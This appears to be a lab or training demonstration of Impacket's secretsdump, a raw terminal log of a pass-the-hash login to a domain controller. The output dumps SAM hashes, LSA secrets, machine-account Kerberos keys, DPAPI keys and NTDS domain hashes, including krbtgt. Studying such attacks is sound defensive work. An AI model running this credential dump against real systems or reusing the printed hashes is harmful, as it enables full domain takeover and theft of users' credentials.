Using Impacket-secretsdump
kali@kali=> impacket-secretsdump -debug -dc-ip 3.14.245.175 [email protected] -hashes :64fbae31cc352fc26af97cbdef151e03
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x6819873eadf71f0789285138af013772
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC
SPARTANCYBERSEC\FIRST-DC$:aes256-cts-hmac-sha1-96:80e764f61ab3cb7fedc4fa0dcc2ae4346b9d86dce406bd0ef6dd171cf1a6b9e4
SPARTANCYBERSEC\FIRST-DC$:aes128-cts-hmac-sha1-96:e4a31fc1ad85640ff2b38263ab9a0bf4
SPARTANCYBERSEC\FIRST-DC$:des-cbc-md5:dc7acb5dd5832920
SPARTANCYBERSEC\FIRST-DC$:plain_password_hex:54ad56e5e0baa13e00c67a093b522c4fbf40c72dbc269b7274ba8c4e15e2c9bfd8f9fe3e476d6ceccc2ba2b22095003aa032b10d349836c8706574b11a003360a371082b6553f00aebce61c9d03b9e1db6433eed00c06bf7f6aecf6e998412fe8c6f5be2567cdfdab688d8342102c075e57e15a7d13732b6c9a974c9b29d47b9c7cb2958a9cdf18bcfff20329f953d0cbc32574dcf024c9c3307621dd56305d421b0c6d0e9e454d10bf079117e29cfe1b00037acec3bdeb2b73b1ee8282118346c13e03f93e051742bbebf21abd46920e48432c50f39d674328c767ebb417df8b37a0c61c1aaeafad9613b9621fe3d5c
SPARTANCYBERSEC\FIRST-DC$:aad3b435b51404eeaad3b435b51404ee:9e24232fd09fa4eb1fdf798597550a40:::
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM
dpapi_machinekey:0x982b8349b7df992ee7c56f20e44f5d151329b6c9
dpapi_userkey:0x3d4de8cb3f5353a1aad075f43682ed753d115a18
[+] Looking into NL$KM
[*] NL$KM
0000 8D D2 8E 67 54 58 89 B1 C9 53 B9 5B 46 A2 B3 66 ...gTX...S.[F..f
0010 D4 3B 95 80 92 7D 67 78 B7 1D F9 2D A5 55 B7 A3 .;...}gx...-.U..
0020 61 AA 4D 86 95 85 43 86 E3 12 9E C4 91 CF 9A 5B a.M...C........[
0030 D8 BB 0D AE FA D3 41 E0 D8 66 3D 19 75 A2 D1 B2 ......A..f=.u...
NL$KM:8dd28e67545889b1c953b95b46a2b366d43b9580927d6778b71df92da555b7a361aa4d8695854386e3129ec491cf9a5bd8bb0daefad341e0d8663d1975a2d1b2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_uAKYyEam
[+] Calling DRSCrackNames for S-1-5-21-1861162130-2580302541-221646211-500
[+] Calling DRSGetNCChanges for {7c1a3d96-7ad9-44a1-a35f-3d06f3fec301}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=spartancybersec,DC=corp
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c90fb8ae170b856da331fa40d5c11769:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b44daa015f201fa31126895ebbcbbcab:::
admin:1008:aad3b435b51404eeaad3b435b51404ee:64fbae31cc352fc26af97cbdef151e03:::